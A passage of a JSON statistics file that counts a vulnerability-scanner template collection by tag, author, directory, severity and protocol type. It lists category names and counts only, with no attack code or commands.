count":1},{"name":"resourcespace","count":1},{"name":"ruby","count":1},{"name":"cgi","count":1},{"name":"ntopng","count":1},{"name":"gogs","count":1},{"name":"sarg","count":1},{"name":"2014","count":1},{"name":"alerta","count":1},{"name":"geddy","count":1},{"name":"phalcon","count":1},{"name":"ems","count":1},{"name":"octoprint","count":1},{"name":"monitorix","count":1},{"name":"bullwark","count":1},{"name":"landray","count":1},{"name":"apos","count":1},{"name":"discord","count":1},{"name":"tileserver","count":1},{"name":"subrion","count":1},{"name":"blue-ocean","count":1},{"name":"centreon","count":1},{"name":"gespage","count":1},{"name":"xml","count":1},{"name":"websvn","count":1},{"name":"logontracer","count":1},{"name":"jmx","count":1},{"name":"powercreator","count":1},{"name":"74cms","count":1},{"name":"influxdb","count":1},{"name":"timesheet","count":1},{"name":"b2evolution","count":1},{"name":"redis","count":1},{"name":"xmlchart","count":1},{"name":"wiki","count":1},{"name":"sage","count":1},{"name":"exacqvision","count":1},{"name":"linksys","count":1},{"name":"rmc","count":1},{"name":"plugin","count":1},{"name":"bash","count":1},{"name":"stem","count":1},{"name":"trilithic","count":1},{"name":"webmin","count":1},{"name":"pulsesecure","count":1},{"name":"xiuno","count":1},{"name":"expn","count":1},{"name":"ruckus","count":1},{"name":"jitsi","count":1},{"name":"beanshell","count":1},{"name":"mysql","count":1},{"name":"ulterius","count":1},{"name":"ssltls","count":1},{"name":"eprints","count":1},{"name":"myucms","count":1},{"name":"javamelody","count":1},{"name":"zeroshell","count":1},{"name":"fortinet","count":1},{"name":"node-red-dashboard","count":1},{"name":"xdcms","count":1},{"name":"nette","count":1},{"name":"sceditor","count":1},{"name":"sentry","count":1},{"name":"nps","count":1},{"name":"primetek","count":1},{"name":"wamp","count":1},{"name":"webadmin","count":1},{"name":"jfrog","count":1},{"name":"netis","count":1},{"name":"postmessage","count":1},{"name":"haproxy","count":1},{"name":"goahead","count":1},{"name":"bitly","count":1},{"name":"blind","count":1},{"name":"netdata","count":1},{"name":"cse","count":1},{"name":"fortigates","count":1},{"name":" default-login","count":1},{"name":"zyxel","count":1},{"name":"bolt","count":1},{"name":"cocoon","count":1},{"name":"aruba","count":1},{"name":"ioncube","count":1},{"name":"webftp","count":1},{"name":"adminer","count":1},{"name":"empirecms","count":1},{"name":"viewlinc","count":1},{"name":"plastic","count":1},{"name":"dompdf","count":1},{"name":"k8","count":1},{"name":"zcms","count":1},{"name":"esmtp","count":1},{"name":"cve2006","count":1},{"name":"yachtcontrol","count":1},{"name":"anchorcms","count":1},{"name":"twitter-server","count":1},{"name":"soar","count":1},{"name":"huijietong","count":1},{"name":"svnserve","count":1},{"name":"dotnet","count":1},{"name":"dvwa","count":1},{"name":"htmli","count":1},{"name":"kyan","count":1},{"name":"nuuo","count":1},{"name":"opensmtpd","count":1},{"name":"postgres","count":1},{"name":"labtech","count":1},{"name":"cerebro","count":1},{"name":"nedi","count":1},{"name":"codeigniter","count":1},{"name":"jenzabar","count":1},{"name":"froxlor","count":1},{"name":"springframework","count":1},{"name":"zookeeper","count":1},{"name":"javafaces","count":1},{"name":"metinfo","count":1},{"name":"pyramid","count":1},{"name":"kafdrop","count":1},{"name":"mdb","count":1},{"name":"harbor","count":1},{"name":"upload","count":1},{"name":"gloo","count":1},{"name":"fastapi","count":1},{"name":"default","count":1},{"name":"prestashop","count":1},{"name":"socomec","count":1},{"name":"favicon","count":1},{"name":"pacsone","count":1},{"name":"argussurveillance","count":1},{"name":"doh","count":1},{"name":"proftpd","count":1},{"name":"avtech","count":1},{"name":"nuxeo","count":1},{"name":"panabit","count":1},{"name":"qcubed","count":1},{"name":"tamronos","count":1},{"name":"bruteforce","count":1},{"name":"qsan","count":1},{"name":"st","count":1},{"name":"pippoint","count":1},{"name":"nweb2fax","count":1},{"name":"triconsole","count":1},{"name":"achecker","count":1},{"name":"servicenow","count":1},{"name":"dotclear","count":1},{"name":"acontent","count":1},{"name":"email","count":1},{"name":"glpi","count":1},{"name":"shopxo","count":1},{"name":"selea","count":1},{"name":"majordomo2","count":1},{"name":"spidercontrol","count":1},{"name":"openstack","count":1},{"name":"wooyun","count":1},{"name":"axis","count":1},{"name":"lutron","count":1},{"name":"office365","count":1},{"name":"diris","count":1},{"name":"solman","count":1},{"name":"turbocrm","count":1},{"name":"ganglia","count":1},{"name":"zm","count":1},{"name":"vscode","count":1},{"name":"chevereto","count":1},{"name":"openrestry","count":1},{"name":"monitorr","count":1},{"name":"spring","count":1},{"name":"jenkin","count":1},{"name":"redhat","count":1},{"name":"mautic","count":1},{"name":"camunda","count":1},{"name":"tenda","count":1},{"name":"opensns","count":1},{"name":"interlib","count":1},{"name":"duomicms","count":1},{"name":"biometrics","count":1},{"name":"totaljs","count":1},{"name":"sco","count":1},{"name":"acme","count":1},{"name":"liferay","count":1},{"name":"ssl","count":1},{"name":"yii","count":1},{"name":"realteo","count":1},{"name":"comodo","count":1},{"name":"xff","count":1},{"name":"landrayoa","count":1},{"name":"npm","count":1},{"name":"idemia","count":1},{"name":"apiman","count":1},{"name":"starttls","count":1},{"name":"appweb","count":1},{"name":"visualtools","count":1},{"name":"dom","count":1},{"name":"enum","count":1},{"name":"crm","count":1},{"name":"opentsdb","count":1},{"name":"emc","count":1},{"name":"openx","count":1},{"name":"feifeicms","count":1},{"name":"maccmsv10","count":1},{"name":"oscommerce","count":1},{"name":"tensorboard","count":1},{"name":"gateone","count":1},{"name":"hadoop","count":1},{"name":"circontrol","count":1},{"name":"etouch","count":1},{"name":"expose","count":1},{"name":"swagger","count":1},{"name":"phpinfo","count":1},{"name":"zzzcms","count":1},{"name":"eyou","count":1},{"name":"shopware","count":1},{"name":"druid","count":1},{"name":"kerbynet","count":1},{"name":"lanproxy","count":1},{"name":"traefik","count":1},{"name":"finereport","count":1},{"name":"webmodule-ee","count":1},{"name":"plone","count":1},{"name":"phpfusion","count":1},{"name":"drone","count":1},{"name":"moin","count":1},{"name":"upnp","count":1},{"name":"lotuscms","count":1},{"name":"saltapi","count":1},{"name":"woocomernce","count":1},{"name":"mongoshake","count":1},{"name":"livezilla","count":1},{"name":"fedora","count":1},{"name":"payara","count":1},{"name":"mantisbt","count":1},{"name":"grails","count":1},{"name":"csrf","count":1},{"name":"jquery","count":1},{"name":"erp-nc","count":1},{"name":"vsphere","count":1},{"name":"synnefo","count":1},{"name":"cloudflare","count":1},{"name":"kubeflow","count":1},{"name":"ns","count":1},{"name":"timeclock","count":1},{"name":"spip","count":1},{"name":"wavemaker","count":1},{"name":"geutebruck","count":1},{"name":"sqlite","count":1},{"name":"setup","count":1},{"name":"robomongo","count":1},{"name":"mantis","count":1},{"name":"ec2","count":1},{"name":"szhe","count":1},{"name":"discourse","count":1},{"name":"ewebs","count":1},{"name":"pagespeed","count":1},{"name":"dvr","count":1},{"name":"ghost","count":1},{"name":"fortigate","count":1},{"name":"netsweeper","count":1},{"name":"mara","count":1},{"name":"arl","count":1},{"name":"fastcgi","count":1},{"name":"bedita","count":1},{"name":"nordex","count":1},{"name":"tieline","count":1},{"name":"domxss","count":1},{"name":"commscope","count":1},{"name":"addpac","count":1},{"name":"jsp","count":1},{"name":"fiori","count":1},{"name":"heroku","count":1},{"name":"rsyncd","count":1},{"name":"jnoj","count":1},{"name":"kong","count":1},{"name":"sitecore","count":1},{"name":"episerver","count":1},{"name":"dnssec","count":1},{"name":"zmanda","count":1},{"name":"blackboard","count":1},{"name":"nsasg","count":1},{"name":"wuzhicms","count":1},{"name":"wmt","count":1}],"authors":[{"name":"dhiyaneshdk","count":239},{"name":"pikpikcu","count":237},{"name":"pdteam","count":194},{"name":"daffainfo","count":136},{"name":"dwisiswant0","count":128},{"name":"geeknik","count":127},{"name":"gy741","count":68},{"name":"madrobot","count":60},{"name":"princechaddha","count":53},{"name":"gaurang","count":42},{"name":"pussycat0x","count":41},{"name":"ice3man","count":26},{"name":"organiccrap","count":24},{"name":"0x_akoko","count":23},{"name":"philippedelteil","count":17},{"name":"sheikhrishad","count":15},{"name":"milo2012","count":14},{"name":"pr3r00t","count":13},{"name":"techbrunchfr","count":13},{"name":"suman_kar","count":12},{"name":"cyllective","count":11},{"name":"righettod","count":10},{"name":"r3dg33k","count":10},{"name":"random_robbie","count":10},{"name":"wdahlenb","count":9},{"name":"hackergautam","count":9},{"name":"iamthefrogy","count":8},{"name":"aashiq","count":8},{"name":"nadino","count":8},{"name":"that_juan_","count":8},{"name":"melbadry9","count":8},{"name":"harshbothra_","count":7},{"name":"randomstr1ng","count":7},{"name":"0x240x23elu","count":7},{"name":"oppsec","count":7},{"name":"techryptic (@tech)","count":7},{"name":"kophjager007","count":7},{"name":"dr_set","count":7},{"name":"emadshanab","count":7},{"name":"__fazal","count":6},{"name":"caspergn","count":6},{"name":"puzzlepeaches","count":6},{"name":"pentest_swissky","count":5},{"name":"yanyun","count":5},{"name":"joanbono","count":5},{"name":"ganofins","count":5},{"name":"iamnoooob","count":5},{"name":"rootxharsh","count":5},{"name":"meme-lord","count":5},{"name":"panch0r3d","count":5},{"name":"elsfa7110","count":4},{"name":"xelkomy","count":4},{"name":"e_schultze_","count":4},{"name":"github.com/its0x08","count":4},{"name":"nodauf","count":4},{"name":"f1tz","count":3},{"name":"dudez","count":3},{"name":"jarijaas","count":3},{"name":"impramodsargar","count":3},{"name":"yash anand @yashanand155","count":3},{"name":"0w4ys","count":3},{"name":"vsh00t","count":3},{"name":"shine","count":3},{"name":"_generic_human_","count":3},{"name":"fyoorer","count":3},{"name":"tess","count":3},{"name":"emenalf","count":3},{"name":"thomas_from_offensity","count":3},{"name":"z3bd","count":3},{"name":"binaryfigments","count":3},{"name":"mavericknerd","count":3},{"name":"shifacyclewala","count":3},{"name":"0xprial","count":2},{"name":"swissky","count":2},{"name":"joeldeleep","count":2},{"name":"0xcrypto","count":2},{"name":"vavkamil","count":2},{"name":"random-robbie","count":2},{"name":"manas_harsh","count":2},{"name":"randomrobbie","count":2},{"name":"0xrudra","count":2},{"name":"lotusdll","count":2},{"name":"ehsahil","count":2},{"name":"x1m_martijn","count":2},{"name":"kiblyn11","count":2},{"name":"nkxxkn","count":2},{"name":"parth","count":2},{"name":"sushantkamble","count":2},{"name":"hahwul","count":2},{"name":"foulenzer","count":2},{"name":"incogbyte","count":2},{"name":"dheerajmadhukar","count":2},{"name":"fabaff","count":2},{"name":"unstabl3","count":2},{"name":"koti2","count":2},{"name":"pxmme1337","count":2},{"name":"moritz nentwig","count":2},{"name":"gevakun","count":2},{"name":"bsysop","count":2},{"name":"0xelkomy","count":2},{"name":"davidmckennirey","count":2},{"name":"afaq","count":2},{"name":"bing0o","count":2},{"name":"amsda","count":2},{"name":"udit_thakkur","count":2},{"name":"0xsapra","count":2},{"name":"zomsop82","count":2},{"name":"ree4pwn","count":2},{"name":"alifathi-h1","count":2},{"name":"lu4nx","count":2},{"name":"bp0lr","count":2},{"name":"gal nagli","count":2},{"name":"hetroublemakr","count":2},{"name":"w4cky_","count":2},{"name":"mahendra purbia (mah3sec_)","count":2},{"name":"arcc","count":2},{"name":"soyelmago","count":1},{"name":"c3l3si4n","count":1},{"name":"j3ssie/geraldino2","count":1},{"name":"ooooooo_q","count":1},{"name":"flag007","count":1},{"name":"ivo palazzolo (@palaziv)","count":1},{"name":"huowuzhao","count":1},{"name":"chron0x","count":1},{"name":"0xtavian","count":1},{"name":"j33n1k4","count":1},{"name":"alph4byt3","count":1},{"name":"r3naissance","count":1},{"name":"s1r1u5_","count":1},{"name":"qlkwej","count":1},{"name":"undefl0w","count":1},{"name":"andysvints","count":1},{"name":"sy3omda","count":1},{"name":"52971","count":1},{"name":"d0rkerdevil","count":1},{"name":"pratik khalane","count":1},{"name":"akshansh","count":1},{"name":"@github.com/defr0ggy","count":1},{"name":"furkansenan","count":1},{"name":"nytr0gen","count":1},{"name":"yashgoti","count":1},{"name":"absshax","count":1},{"name":"abison_binoy","count":1},{"name":"0xteles","count":1},{"name":"ringo","count":1},{"name":"mesaglio","count":1},{"name":"cookiehanhoan","count":1},{"name":"_harleo","count":1},{"name":"daviey","count":1},{"name":"akash.c","count":1},{"name":"bernardo rodrigues @bernardofsr | andré monteiro @am0nt31r0","count":1},{"name":"pudsec","count":1},{"name":"yashanand155","count":1},{"name":"sid ahmed malaoui @ realistic security","count":1},{"name":"rojanrijal","count":1},{"name":"remonsec","count":1},{"name":"hanlaomo","count":1},{"name":"rodnt","count":1},{"name":"luskabol","count":1},{"name":"wabafet","count":1},{"name":"sickwell","count":1},{"name":"udyz","count":1},{"name":"berkdusunur","count":1},{"name":"rtcms","count":1},{"name":"mubassirpatel","count":1},{"name":"idealphase","count":1},{"name":"zhenwarx","count":1},{"name":"sullo","count":1},{"name":"schniggie","count":1},{"name":"jeya seelan","count":1},{"name":"micha3lb3n","count":1},{"name":"yavolo","count":1},{"name":"omarkurt","count":1},{"name":"noamrathaus","count":1},{"name":"bernardofsr","count":1},{"name":"its0x08","count":1},{"name":"iampritam","count":1},{"name":"mohammedsaneem","count":1},{"name":"juicypotato1","count":1},{"name":"mass0ma","count":1},{"name":"naglinagli","count":1},{"name":"streetofhackerr007 (rohit soni)","count":1},{"name":"un-fmunozs","count":1},{"name":"tirtha_mandal","count":1},{"name":"kabirsuda","count":1},{"name":"hakluke","count":1},{"name":"_c0wb0y_","count":1},{"name":"bjhulst","count":1},{"name":"aresx","count":1},{"name":"geraldino2","count":1},{"name":"adrianmf","count":1},{"name":"whynotke","count":1},{"name":"revblock","count":1},{"name":"g4l1t0 and @convisoappsec","count":1},{"name":"knassar702","count":1},{"name":"toufik airane","count":1},{"name":"gboddin","count":1},{"name":"elder tao","count":1},{"name":"_darrenmartyn","count":1},{"name":"apt-mirror","count":1},{"name":"jteles","count":1},{"name":"makyotox","count":1},{"name":"me9187","count":1},{"name":"raesene","count":1},{"name":"vzamanillo","count":1},{"name":"aaron_costello (@conspiracyproof)","count":1},{"name":"ohlinge","count":1},{"name":"thevillagehacker","count":1},{"name":"taielab","count":1},{"name":"ilovebinbash","count":1},{"name":"blckraven","count":1},{"name":"thezakman","count":1},{"name":"@dwisiswant0","count":1},{"name":"ldionmarcil","count":1},{"name":"shreyapohekar","count":1},{"name":"andirrahmani1","count":1},{"name":"dogasantos","count":1},{"name":"mhdsamx","count":1},{"name":"zandros0","count":1},{"name":"affix","count":1},{"name":"becivells","count":1},{"name":"aceseven (digisec360)","count":1},{"name":"notsoevilweasel","count":1},{"name":"ratnadip gajbhiye","count":1},{"name":"tim_koopmans","count":1},{"name":"smaranchand","count":1},{"name":"regala_","count":1},{"name":"th3.d1p4k","count":1},{"name":"pdp","count":1},{"name":"deena","count":1},{"name":"intx0x80","count":1},{"name":"manuelbua","count":1},{"name":"divya_mudgal","count":1},{"name":"dawid czarnecki","count":1},{"name":"0h1in9e","count":1},{"name":"ajaysenr","count":1},{"name":"willd96","count":1},{"name":"0xrod","count":1},{"name":"philippdelteil","count":1},{"name":"johnjhacking","count":1},{"name":"retr0","count":1},{"name":"alex","count":1},{"name":"defr0ggy","count":1},{"name":"johnk3r","count":1},{"name":"elmahdi","count":1},{"name":"ipanda","count":1},{"name":"0ut0fb4nd","count":1},{"name":"sshell","count":1},{"name":"b0yd","count":1},{"name":"sicksec","count":1},{"name":"petruknisme","count":1},{"name":"luci","count":1},{"name":"mah3sec_","count":1},{"name":"bad5ect0r","count":1},{"name":"patralos","count":1},{"name":"shifacyclewla","count":1},{"name":"shelld3v","count":1},{"name":"ahmed sherif","count":1},{"name":"kba@sogeti_esec","count":1},{"name":"alperenkesk","count":1},{"name":"fmunozs","count":1},{"name":"kareemse1im","count":1},{"name":"manikanta a.k.a @secureitmania","count":1},{"name":"streetofhackerr007","count":1},{"name":"co0nan","count":1},{"name":"b4uh0lz","count":1},{"name":"fopina","count":1},{"name":"bolli95","count":1},{"name":"exploitation","count":1},{"name":"kishore krishna (sillydaddy)","count":1},{"name":"kurohost","count":1}],"directory":[{"name":"cves","count":597},{"name":"vulnerabilities","count":265},{"name":"exposed-panels","count":221},{"name":"exposures","count":174},{"name":"technologies","count":159},{"name":"misconfiguration","count":124},{"name":"takeovers","count":70},{"name":"default-logins","count":51},{"name":"file","count":46},{"name":"workflows","count":35},{"name":"network","count":27},{"name":"miscellaneous","count":27},{"name":"iot","count":23},{"name":"dns","count":11},{"name":"cnvd","count":9},{"name":"fuzzing","count":8},{"name":"headless","count":5},{"name":".pre-commit-config.yaml","count":1}],"severity":[{"name":"info","count":583},{"name":"high","count":465},{"name":"medium","count":387},{"name":"critical","count":226},{"name":"low","count":156}],"types":[{"name":"http","count":1720},{"name":"file","count":46},{"name":"network","count":35},{"name":"dns","count":11}]} +{"tags":[{"name":"cve","count":624},{"name":"panel","count":222},{"name":"xss","count":221},{"name":"exposure","count":212},{"name":"lfi","count":203},{"name":"wordpress","count":203},{"name":"rce","count":189},{"name":"cve2020","count":157},{"name":"wp-plugin","count":136},{"name":"tech","count":103},{"name":"cve2021","count":103},{"name":"config","count":93},{"name":"cve2019","count":88},{"name":"cve2018","count":78},{"name":"takeover","count":74},{"name":"","count":65},{"name":"apache","count":64},{"name":"token","count":64},{"name":"default-login","count":57},{"name":"iot","count":54},{"name":"cve2017","count":48},{"name":"file","count":46},{"name":"oob","count":45},{"name":"unauth","count":42},{"name":"network","count":38},{"name":"joomla","count":36},{"name":"sqli","count":36},{"name":"ssrf","count":32},{"name":"cve2016","count":32},{"name":"workflow","count":30},{"name":"oracle","count":30},{"name":"logs","count":30},{"name":"cve2010","count":28},{"name":"atlassian","count":27},{"name":"misc","count":27},{"name":"jira","count":27},{"name":"redirect","count":25},{"name":"listing","count":25},{"name":"generic","count":22},{"name":"aem","count":19},{"name":"cisco","count":19},{"name":"disclosure","count":18},{"name":"cve2015","count":18},{"name":"sap","count":18},{"name":"router","count":17},{"name":"auth-bypass","count":16},{"name":"springboot","count":16},{"name":"cve2014","count":15},{"name":"cve2012","count":14},{"name":"debug","count":14},{"name":"misconfig","count":13},{"name":"android","count":13},{"name":"struts","count":13},{"name":"fuzz","count":13},{"name":"cve2011","count":13},{"name":"weblogic","count":12},{"name":"dns","count":12},{"name":"dlink","count":12},{"name":"adobe","count":12},{"name":"jenkins","count":12},{"name":"devops","count":11},{"name":"php","count":11},{"name":"cve2013","count":11},{"name":"zoho","count":11},{"name":"magento","count":9},{"name":"xxe","count":9},{"name":"ftp","count":9},{"name":"ruijie","count":8},{"name":"login","count":8},{"name":"aws","count":8},{"name":"rails","count":8},{"name":"airflow","count":8},{"name":"cnvd","count":8},{"name":"scada","count":8},{"name":"gitlab","count":8},{"name":"cve2009","count":7},{"name":"backup","count":7},{"name":"nginx","count":7},{"name":"vmware","count":7},{"name":"cms","count":6},{"name":"google","count":6},{"name":"jetty","count":6},{"name":"api","count":6},{"name":"dell","count":6},{"name":"citrix","count":6},{"name":"files","count":6},{"name":"laravel","count":6},{"name":"netgear","count":6},{"name":"rconfig","count":6},{"name":"cve2008","count":6},{"name":"django","count":6},{"name":"solr","count":6},{"name":"coldfusion","count":6},{"name":"drupal","count":5},{"name":"phpmyadmin","count":5},{"name":"iis","count":5},{"name":"circarlife","count":5},{"name":"headless","count":5},{"name":"microsoft","count":5},{"name":"windows","count":5},{"name":"confluence","count":5},{"name":"docker","count":5},{"name":"lucee","count":5},{"name":"fileupload","count":5},{"name":"wp-theme","count":5},{"name":"ssti","count":5},{"name":"java","count":5},{"name":"ibm","count":5},{"name":"dedecms","count":5},{"name":"firmware","count":4},{"name":"webserver","count":4},{"name":"grafana","count":4},{"name":"thinkphp","count":4},{"name":"traversal","count":4},{"name":"jolokia","count":4},{"name":"crlf","count":4},{"name":"vpn","count":4},{"name":"deserialization","count":4},{"name":"hp","count":4},{"name":"moodle","count":4},{"name":"magmi","count":4},{"name":"asp","count":4},{"name":"tomcat","count":4},{"name":"solarwinds","count":4},{"name":"elastic","count":4},{"name":"zimbra","count":4},{"name":"thinkcmf","count":4},{"name":"artifactory","count":4},{"name":"hongdian","count":4},{"name":"samsung","count":4},{"name":"nodejs","count":4},{"name":"exchange","count":4},{"name":"buffalo","count":4},{"name":"itop","count":3},{"name":"mongodb","count":3},{"name":"nacos","count":3},{"name":"kevinlab","count":3},{"name":"log","count":3},{"name":"slack","count":3},{"name":"bypass","count":3},{"name":"printer","count":3},{"name":"intrusive","count":3},{"name":"httpd","count":3},{"name":"oa","count":3},{"name":"nexus","count":3},{"name":"zhiyuan","count":3},{"name":"backups","count":3},{"name":"terramaster","count":3},{"name":"lfr","count":3},{"name":"resin","count":3},{"name":"targa","count":3},{"name":"ebs","count":3},{"name":"kafka","count":3},{"name":"microstrategy","count":3},{"name":"ofbiz","count":3},{"name":"opensis","count":3},{"name":"r-seenet","count":3},{"name":"ssh","count":3},{"name":"bitrix","count":3},{"name":"openssh","count":3},{"name":"springcloud","count":3},{"name":"fpd","count":3},{"name":"wso2","count":3},{"name":"amazon","count":3},{"name":"symfony","count":3},{"name":"kubernetes","count":3},{"name":"zabbix","count":3},{"name":"fanruan","count":3},{"name":"git","count":3},{"name":"tikiwiki","count":3},{"name":"nosqli","count":3},{"name":"vbulletin","count":3},{"name":"caucho","count":3},{"name":"sharepoint","count":2},{"name":"strapi","count":2},{"name":"chiyu","count":2},{"name":"kibana","count":2},{"name":"netis","count":2},{"name":"vrealize","count":2},{"name":"mida","count":2},{"name":"sonarqube","count":2},{"name":"mail","count":2},{"name":"idrac","count":2},{"name":"shellshock","count":2},{"name":"trixbox","count":2},{"name":"mcafee","count":2},{"name":"telerik","count":2},{"name":"jellyfin","count":2},{"name":"prometheus","count":2},{"name":"smb","count":2},{"name":"avantfax","count":2},{"name":"rockethchat","count":2},{"name":"bigip","count":2},{"name":"yapi","count":2},{"name":"oauth","count":2},{"name":"proxy","count":2},{"name":"jsf","count":2},{"name":"natshell","count":2},{"name":"firebase","count":2},{"name":"status","count":2},{"name":"plesk","count":2},{"name":"huawei","count":2},{"name":"maian","count":2},{"name":"nagios","count":2},{"name":"rockmongo","count":2},{"name":"kentico","count":2},{"name":"icewarp","count":2},{"name":"jeedom","count":2},{"name":"leak","count":2},{"name":"keycloak","count":2},{"name":"linkerd","count":2},{"name":"hasura","count":2},{"name":"openam","count":2},{"name":"guacamole","count":2},{"name":"hjtcloud","count":2},{"name":"odoo","count":2},{"name":"igs","count":2},{"name":"service","count":2},{"name":"smtp","count":2},{"name":"fortios","count":2},{"name":"openfire","count":2},{"name":"chamilo","count":2},{"name":"pega","count":2},{"name":"ucmdb","count":2},{"name":"cve2005","count":2},{"name":"voipmonitor","count":2},{"name":"hpe","count":2},{"name":"hashicorp","count":2},{"name":"rstudio","count":2},{"name":"azure","count":2},{"name":"ecology","count":2},{"name":"grav","count":2},{"name":"cache","count":2},{"name":"showdoc","count":2},{"name":"injection","count":2},{"name":"emerge","count":2},{"name":"cve2007","count":2},{"name":"frp","count":2},{"name":"nextjs","count":2},{"name":"webcam","count":2},{"name":"activemq","count":2},{"name":"glassfish","count":2},{"name":"akkadian","count":2},{"name":"github","count":2},{"name":"saltstack","count":2},{"name":"waf","count":2},{"name":"spark","count":2},{"name":"geowebserver","count":2},{"name":"jboss","count":2},{"name":"dos","count":2},{"name":"wordfence","count":2},{"name":"xxljob","count":2},{"name":"splunk","count":2},{"name":"couchdb","count":2},{"name":"dolibarr","count":2},{"name":"seeyon","count":2},{"name":"paloalto","count":2},{"name":"backdoor","count":2},{"name":"akamai","count":2},{"name":"globalprotect","count":2},{"name":"flir","count":2},{"name":"sonicwall","count":2},{"name":"phpcollab","count":2},{"name":"horde","count":2},{"name":"csrf","count":1},{"name":"sco","count":1},{"name":"redhat","count":1},{"name":"ambari","count":1},{"name":"geutebruck","count":1},{"name":"sgp","count":1},{"name":"xvr","count":1},{"name":"gespage","count":1},{"name":"bullwark","count":1},{"name":"sophos","count":1},{"name":"memcached","count":1},{"name":"ilo","count":1},{"name":"smi","count":1},{"name":"hadoop","count":1},{"name":"ns","count":1},{"name":"xiuno","count":1},{"name":"dotnetnuke","count":1},{"name":"opensmtpd","count":1},{"name":"exponentcms","count":1},{"name":"exposures","count":1},{"name":"kerbynet","count":1},{"name":"spip","count":1},{"name":"ruby","count":1},{"name":"tenda","count":1},{"name":"mantisbt","count":1},{"name":"nuxeo","count":1},{"name":"clave","count":1},{"name":"varnish","count":1},{"name":"ewebs","count":1},{"name":"cofax","count":1},{"name":"grails","count":1},{"name":"visionhub","count":1},{"name":"logontracer","count":1},{"name":"monitorix","count":1},{"name":"biometrics","count":1},{"name":"klog","count":1},{"name":"twitter-server","count":1},{"name":"xunchi","count":1},{"name":"openx","count":1},{"name":"ssl","count":1},{"name":"expose","count":1},{"name":"viewlinc","count":1},{"name":"realteo","count":1},{"name":"labtech","count":1},{"name":"camera","count":1},{"name":"nomad","count":1},{"name":"2014","count":1},{"name":"dnssec","count":1},{"name":"magicflow","count":1},{"name":"panabit","count":1},{"name":"zmanda","count":1},{"name":"totaljs","count":1},{"name":"traefik","count":1},{"name":"cherokee","count":1},{"name":"subrion","count":1},{"name":"mailchimp","count":1},{"name":"acme","count":1},{"name":"aruba","count":1},{"name":"manageengine","count":1},{"name":"cocoon","count":1},{"name":"embedthis","count":1},{"name":"portainer","count":1},{"name":"timeclock","count":1},{"name":"axis","count":1},{"name":"majordomo2","count":1},{"name":"pgadmin","count":1},{"name":"k8","count":1},{"name":"turbocrm","count":1},{"name":"livezilla","count":1},{"name":"fuelcms","count":1},{"name":"nuuo","count":1},{"name":"landrayoa","count":1},{"name":"krweb","count":1},{"name":"liferay","count":1},{"name":"esmtp","count":1},{"name":"szhe","count":1},{"name":"timesheet","count":1},{"name":"jenkin","count":1},{"name":"pippoint","count":1},{"name":"spectracom","count":1},{"name":"uwsgi","count":1},{"name":"goahead","count":1},{"name":"bigbluebutton","count":1},{"name":"dotclear","count":1},{"name":"dotnet","count":1},{"name":"cloudinary","count":1},{"name":"nedi","count":1},{"name":"bruteforce","count":1},{"name":"mantis","count":1},{"name":"tjws","count":1},{"name":"clockwatch","count":1},{"name":"zyxel","count":1},{"name":"wazuh","count":1},{"name":"sage","count":1},{"name":"jnoj","count":1},{"name":"zarafa","count":1},{"name":"glpi","count":1},{"name":"saltapi","count":1},{"name":"vsphere","count":1},{"name":"cerebro","count":1},{"name":"postmessage","count":1},{"name":"plastic","count":1},{"name":"finereport","count":1},{"name":"rfi","count":1},{"name":"chevereto","count":1},{"name":"clusterengine","count":1},{"name":"moinmoin","count":1},{"name":"erp-nc","count":1},{"name":"jquery","count":1},{"name":"netsweeper","count":1},{"name":"sidekiq","count":1},{"name":"extractor","count":1},{"name":"sarg","count":1},{"name":"redis","count":1},{"name":"geddy","count":1},{"name":"announcekit","count":1},{"name":"xdcms","count":1},{"name":"crm","count":1},{"name":"svn","count":1},{"name":"sangfor","count":1},{"name":"mara","count":1},{"name":"avalanche","count":1},{"name":"lotuscms","count":1},{"name":"vsftpd","count":1},{"name":"blackboard","count":1},{"name":"kyan","count":1},{"name":"fedora","count":1},{"name":"iptime","count":1},{"name":"dvwa","count":1},{"name":"blind","count":1},{"name":"gogs","count":1},{"name":"getsimple","count":1},{"name":"doh","count":1},{"name":"email","count":1},{"name":"cve2006","count":1},{"name":"cse","count":1},{"name":"primetek","count":1},{"name":"camunda","count":1},{"name":"ecom","count":1},{"name":"influxdb","count":1},{"name":"hiboss","count":1},{"name":"exacqvision","count":1},{"name":"harbor","count":1},{"name":"razor","count":1},{"name":"aura","count":1},{"name":"optiLink","count":1},{"name":"bookstack","count":1},{"name":"floc","count":1},{"name":"nordex","count":1},{"name":"jitsi","count":1},{"name":"cloudflare","count":1},{"name":" default-login","count":1},{"name":"zenario","count":1},{"name":"tectuus","count":1},{"name":"visualtools","count":1},{"name":"npm","count":1},{"name":"netrc","count":1},{"name":"qdpm","count":1},{"name":"skywalking","count":1},{"name":"diris","count":1},{"name":"webmin","count":1},{"name":"pacsone","count":1},{"name":"ems","count":1},{"name":"tracer","count":1},{"name":"perl","count":1},{"name":"redcap","count":1},{"name":"gloo","count":1},{"name":"spf","count":1},{"name":"rdp","count":1},{"name":"auth","count":1},{"name":"fastapi","count":1},{"name":"shopxo","count":1},{"name":"ghost","count":1},{"name":"svnserve","count":1},{"name":"phpfastcache","count":1},{"name":"cobub","count":1},{"name":"st","count":1},{"name":"opm","count":1},{"name":"keenetic","count":1},{"name":"ricoh","count":1},{"name":"mobileiron","count":1},{"name":"rubedo","count":1},{"name":"springframework","count":1},{"name":"wmt","count":1},{"name":"wing-ftp","count":1},{"name":"mediumish","count":1},{"name":"soar","count":1},{"name":"appweb","count":1},{"name":"vnc","count":1},{"name":"synnefo","count":1},{"name":"bash","count":1},{"name":"wuzhicms","count":1},{"name":"sprintful","count":1},{"name":"kong","count":1},{"name":"yii","count":1},{"name":"office365","count":1},{"name":"emc","count":1},{"name":"jeewms","count":1},{"name":"wooyun","count":1},{"name":"mariadb","count":1},{"name":"codeigniter","count":1},{"name":"webftp","count":1},{"name":"bolt","count":1},{"name":"wavemaker","count":1},{"name":"linux","count":1},{"name":"flink","count":1},{"name":"eyou","count":1},{"name":"monitorr","count":1},{"name":"ssltls","count":1},{"name":"zzzcms","count":1},{"name":"clink-office","count":1},{"name":"fiori","count":1},{"name":"sqlite","count":1},{"name":"node","count":1},{"name":"pulsesecure","count":1},{"name":"ntopng","count":1},{"name":"mysql","count":1},{"name":"checkpoint","count":1},{"name":"lanproxy","count":1},{"name":"duomicms","count":1},{"name":"parentlink","count":1},{"name":"nps","count":1},{"name":"moin","count":1},{"name":"node-red-dashboard","count":1},{"name":"eprints","count":1},{"name":"apos","count":1},{"name":"setup","count":1},{"name":"miscrsoft","count":1},{"name":"pyramid","count":1},{"name":"hortonworks","count":1},{"name":"linksys","count":1},{"name"